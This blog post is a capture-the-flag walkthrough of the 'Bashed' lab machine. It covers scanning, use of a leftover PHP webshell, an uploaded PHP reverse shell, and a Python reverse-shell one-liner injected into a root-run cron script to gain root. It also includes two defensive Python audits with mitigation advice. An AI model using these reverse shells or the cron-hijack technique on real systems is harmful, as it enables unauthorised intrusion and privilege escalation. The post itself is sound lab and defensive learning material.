Posted on Apr 29, 2020
tl;dr: box takeover with webshell and python

Information Gathering

IP address:


$ nmap -sC -sV -oA nmap/bashed -p- -Pn -T4  
Starting Nmap 7.80 ( ) at 2020-04-29 21:23 CEST  
Nmap scan report for  
Host is up (0.031s latency).  
Not shown: 65534 closed ports  
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))  
|_http-server-header: Apache/2.4.18 (Ubuntu)  
|_http-title: Arrexel's Development Site  
Service detection performed. Please report any incorrect results at ( ).  
Nmap done: 1 IP address (1 host up) scanned in 22.68 seconds
Open ports


A web page was presented on port 80.


Some interesting folders were found with gobuster.

$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u

Gobuster v3.0.1  
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)  
[+] Url:  
[+] Threads: 10  
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  
[+] Status codes: 200,204,301,302,307,401,403  
[+] User Agent: gobuster/3.0.1  
[+] Timeout: 10s  
2020/04/29 21:29:43 Starting gobuster  
/images (Status: 301)  
/uploads (Status: 301)  
/php (Status: 301)  
/css (Status: 301)  
/dev (Status: 301)  
/js (Status: 301)  
/fonts (Status: 301)  
/server-status (Status: 403)  
2020/04/29 21:40:54 Finished  

Under the /dev folder there's a file called phpbash.php, which is a webshell that we can use to our benefit.

Visit the webshell and see if we can get the contents of user.txt.

www-data@bashed:/home/arrexel# cat user.txt  

To get a reverse shell instead, let's set up a PHP reverse shell.

kryssar@kali:/var/www/html$ sudo cp /usr/share/webshells/php/php-reverse-shell.php .  
mv php-reverse-shell.php phprev.php

Change the IP and necessary information to connect back to Kali on port 9443, then download the file (presented via apache/python on port 80) to the victim.


There were some issues with uploading it as PHP, so instead upload it as .txt and then rename it on the target. Once it's renamed, visit the page from our Kali machine and see if the code executes properly.
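From the defender's side, the two findings above (a leftover phpbash.php under /dev, and a payload that lands in /uploads as .txt and is renamed to .php) share one root cause: the server executes PHP from directories that should only ever serve static content. The following audit is an added example written for this post, not code from the box or from its author; it walks a web root and flags server-side scripts under the static-only directories from the gobuster listing. The extension list, the sample directory tree and the file names inside it (contact.php is a hypothetical legitimate file) are constructed for the example.

```python
import tempfile
from pathlib import Path

# Extensions Apache hands to mod_php in a stock handler mapping (assumption for this example)
SERVER_SIDE_EXTENSIONS = {".php", ".phtml", ".phar"}

# Top-level directories that should only ever hold static content (from the gobuster listing)
STATIC_DIRS = {"images", "uploads", "css", "js", "fonts", "dev"}


def find_unexpected_scripts(webroot, static_dirs=STATIC_DIRS, extensions=SERVER_SIDE_EXTENSIONS):
    """Return sorted, web-root-relative paths of server-side scripts found under static-only directories.

    A PHP file sitting in /dev or /uploads is either a leftover debugging tool (phpbash.php)
    or an uploaded-and-renamed payload (phprev.php); a legitimate application keeps its PHP
    in its own code directories.
    """
    root = Path(webroot)
    hits = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        top_dir = rel.parts[0] if len(rel.parts) > 1 else None  # None for files directly in the root
        if top_dir in static_dirs and path.suffix.lower() in extensions:
            hits.append(rel.as_posix())
    return sorted(hits)


def build_sample_webroot():
    """Create a throwaway web root mirroring the gobuster listing (constructed sample, not the box itself)."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    for name in STATIC_DIRS | {"php"}:
        (root / name).mkdir()
    (root / "index.html").write_text("<html></html>\n")
    (root / "images" / "logo.png").write_bytes(b"\x89PNG\r\n")
    (root / "php" / "contact.php").write_text("<?php /* hypothetical legitimate app code */ ?>\n")
    (root / "dev" / "phpbash.php").write_text("<?php /* webshell left on the box */ ?>\n")
    (root / "uploads" / "phprev.txt").write_text("<?php /* payload uploaded as .txt */ ?>\n")
    (root / "uploads" / "phprev.php").write_text("<?php /* ...and renamed so Apache executes it */ ?>\n")
    return root


if __name__ == "__main__":
    for hit in find_unexpected_scripts(build_sample_webroot()):
        print("unexpected server-side script:", hit)
```

Note the caveat the rename trick exposes: the .txt copy is invisible to an extension-based check, and it becomes dangerous only once it is renamed, which requires www-data to have write access to that directory. The check is therefore a detection aid; the actual fix is to stop the server executing anything under those directories (with mod_php, `php_admin_flag engine off` inside the `<Directory>` block for uploads, or a `<FilesMatch "\.php$">` rule denying requests there), to keep upload directories non-writable by the web server user where possible, and to remove the leftover webshell.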

kryssar@kali:/media/sf_PENTEST/HTB/bashed$ nc -nlvp 1234  
Ncat: Version 7.80 ( )  
Ncat: Listening on :::1234  
Ncat: Listening on  
Ncat: Connection from  
Ncat: Connection from  
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux  
13:36:58 up 1:11, 0 users, load average: 0.00, 0.00, 0.00  
uid=33(www-data) gid=33(www-data) groups=33(www-data)  
/bin/sh: 0: can't access tty; job control turned off  
$ id  
uid=33(www-data) gid=33(www-data) groups=33(www-data)  

Upgrade the shell so we get a proper prompt and some better handling.

python -c 'import pty; pty.spawn("/bin/bash")'

Once the shell is upgraded, it’s time to check out the permissions on this ride.

www-data@bashed:/$ sudo -l  
Matching Defaults entries for www-data on bashed:  
env_reset, mail_badpass,  
User www-data may run the following commands on bashed:  
(scriptmanager : scriptmanager) NOPASSWD: ALL

It looks like we can run anything as the scriptmanager user, so let's try to use those permissions to our advantage. Perhaps send back a reverse shell?

Under a folder called scripts there's an interesting file called with the contents:

scriptmanager@bashed:/scripts$ cat  
f = open("test.txt", "w")  
f.write("testing 123!")  

Perhaps this file is run by the server every now and then? Let's use a trick from pentestmonkey to run a Python reverse shell.

echo -n "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[\"/bin/bash\",\"-i\"]);" >

Note: character escaping is important (it was a source of some headache).

Once the script runs (it's on a timer and runs every minute), as long as there's a listener on our Kali machine, the reverse shell will be sent out.
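The privilege escalation here works because a root-run timer job executes a file that the unprivileged scriptmanager account owns and can edit. Auditing for exactly that is cheap, so here is an added example (written for this post, not code from the box or its author) that parses /etc/crontab-style entries and flags any root job whose script, interpreter or parent directory is owned by a non-root user or is group/world-writable. The crontab text, the script name /scripts/job.py and uid 1001 for scriptmanager are all constructed assumptions; collect_metadata() is the hook that would read the real owner and mode bits on a live host.

```python
import os
import stat
from dataclasses import dataclass
from pathlib import PurePosixPath


@dataclass(frozen=True)
class FileMeta:
    uid: int   # owning user id
    mode: int  # permission bits only, e.g. 0o644


def parse_system_crontab(text):
    """Yield (user, command) pairs from /etc/crontab-style lines: five schedule fields, a user, a command."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        parts = line.split(None, 6)
        if len(parts) == 7:
            yield parts[5], parts[6]


def collect_metadata(paths):
    """Read owner and mode from the live filesystem for the paths that exist (used on a real host)."""
    meta = {}
    for p in paths:
        try:
            st = os.stat(p)
        except OSError:
            continue
        meta[p] = FileMeta(st.st_uid, stat.S_IMODE(st.st_mode))
    return meta


def audit_crontab(text, metadata, trusted_uids=frozenset({0})):
    """Flag root cron jobs whose script, interpreter or any parent directory a non-root user can modify.

    Returns (command, path, reason) tuples. Parent directories count because whoever can write
    the directory can replace the script, even when the script itself is root-owned.
    """
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue  # only jobs that run as root turn a writable file into root code execution
        for token in command.split():
            if not token.startswith("/"):
                continue
            parents = [str(p) for p in PurePosixPath(token).parents if str(p) != "/"]
            for path in [token] + parents:
                meta = metadata.get(path)
                if meta is None:
                    continue
                if meta.uid not in trusted_uids:
                    findings.append((command, path, f"owned by uid {meta.uid}, not root"))
                elif meta.mode & (stat.S_IWGRP | stat.S_IWOTH):
                    findings.append((command, path, "group- or world-writable"))
    return findings


# Constructed sample modelled on the box: a root job runs a script that lives in a directory
# owned by the unprivileged scriptmanager account (uid 1001 and the file name are assumptions).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
* * * * * root /usr/bin/python /scripts/job.py
17 * * * * root /usr/bin/logrotate /etc/logrotate.conf
"""

SAMPLE_METADATA = {
    "/usr": FileMeta(0, 0o755),
    "/usr/bin": FileMeta(0, 0o755),
    "/usr/bin/python": FileMeta(0, 0o755),
    "/usr/bin/logrotate": FileMeta(0, 0o755),
    "/etc": FileMeta(0, 0o755),
    "/etc/logrotate.conf": FileMeta(0, 0o644),
    "/scripts": FileMeta(1001, 0o755),
    "/scripts/job.py": FileMeta(1001, 0o644),
}

if __name__ == "__main__":
    for command, path, reason in audit_crontab(SAMPLE_CRONTAB, SAMPLE_METADATA):
        print(f"[!] {path}: {reason}  (job: {command})")
```

Run against the sample it reports both the script and its directory. The fix on a real host is the mirror image of the finding: root-run jobs should only reference files and directories that root owns and that nobody else can write, and the logrotate entry shows what a clean job looks like. The same audit extends naturally to per-user crontabs in /var/spool/cron and to systemd timer units, which only changes the parser, not the ownership check.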

Ncat: Version 7.80 ( )  
Ncat: Listening on :::1235  
Ncat: Listening on  
Ncat: Connection from  
Ncat: Connection from  
bash: cannot set terminal process group (17527): Inappropriate ioctl for device  
bash: no job control in this shell  
root@bashed:/scripts# cd ~ && cat root.txt